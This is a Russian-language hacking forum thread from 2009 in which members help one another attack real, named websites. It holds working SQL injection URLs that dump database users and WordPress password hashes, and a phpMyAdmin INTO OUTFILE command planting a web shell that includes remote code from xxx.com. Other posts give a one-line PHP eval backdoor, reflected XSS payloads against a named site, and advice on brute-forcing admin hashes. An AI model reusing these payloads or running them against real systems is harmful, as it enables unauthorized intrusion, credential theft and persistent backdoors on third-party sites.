Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2'

    это слепая инъекция?
     
  2. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    да нет, зрячая)
    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(),version())+using+latin1),4,5,6,7,8/*
     
  3. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Code:
    http://www.convex.ru/news/news-203.html?=1'
    Как-нибудь можно дальше скуль раскрутить?

    Ошибка в подвале страницы.
     
  4. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Можно даже вывод сделать
    Когда идет упдейт сессии:
    _http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='
     
    4 people like this.
  5. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    не работают "комментарии" в MySQL
    нашел сайтик там в поле логина нет проверки на '.
    ну и выдает при запросе 'union select 1/*
    Code:
    
    Context info for the following error/warning:
    Error: 1024, Query(r) failed:
    SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
    With result:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
    in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381
    
    call: DB->queryex("r", "SELECT u.email, u.userid
    FROM user u
    WHERE u.username='1' union select 1/*'
    AND u.email=''")
    
    и так дальше в таком же духе... не --, не # не помогает... что можно попробывать?
     
  6. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
     
  7. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
     
  8. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    http://events.wayne.edu/index.php?cat=24'+order+by+2/*
    при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...
     
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    2slammer
    http://www.phpclub.ru/mysql/doc/comments.html
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    зависит от версии mysql. Поэтому, не зная заранее, только методом научного тыка
     
  11. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    пытаюсь залить шелл через phpmyadmin...

    командой
    select '<? @include("http://xxx.com/shell.txt"); ?>' into outfile '/usr/local/www/main/shell.php';

    выдает ошибку
    "Вероятно, размер загружаемого файла слишком велик. Способы обхода данного ограничения описаны в документации "

    вес шелла 22кб

    как обойти ?по албански не особо шарю

    зы версия phpmyadmin 2.11.1.1
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Я бы тебе дал код, но это приват. А вообще:

    PHP:
    <?=eval($_GET[c])?>
    вот этого будет достаточно для инклуда, при любых условиях
     
  13. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    прочитал таблицы в information_schema и попробовал достать пароль:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user_login,%20%20user_pass)+using+latin1),4,5,6,7,8+from+wp_users/*

    но выдает почемуто: Oops Table 'mcli_resources.wp_users' doesn't exist
    как такое может быть?
     
  14. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    мде

    blog_its.wp_users
    табла в другой бд
    select table_schema from information_schema.tables
    ПОЧИТАЙ ПОДПИСЬ jokester ,КРАСНЫМ ВЫДЕЛЕН0
     
    #7234 S00pY, 23 May 2009
    Last edited: 23 May 2009
    1 person likes this.
  15. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Админка TIGERADMIN v.9. ХЗ что за админка и как пароли зашифрованы.
    Кто что думает ?
     
  16. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
  17. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    У всех приставка ta в начале почему то, её просто отбрасывать перед брутом..... Вообще можно сбрутить?
     
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    можно.
     
  19. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен:
    http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&taskid=8&pv=no
     
  20. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    та значения непосредственно в тег <script> вставляеться(и это пассивка а не активка):
    PHP:
    http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%27,%27%27);%20}%20alert(%22test%22);%20%3C/script%3E
     
Thread Status:
Not open for further replies.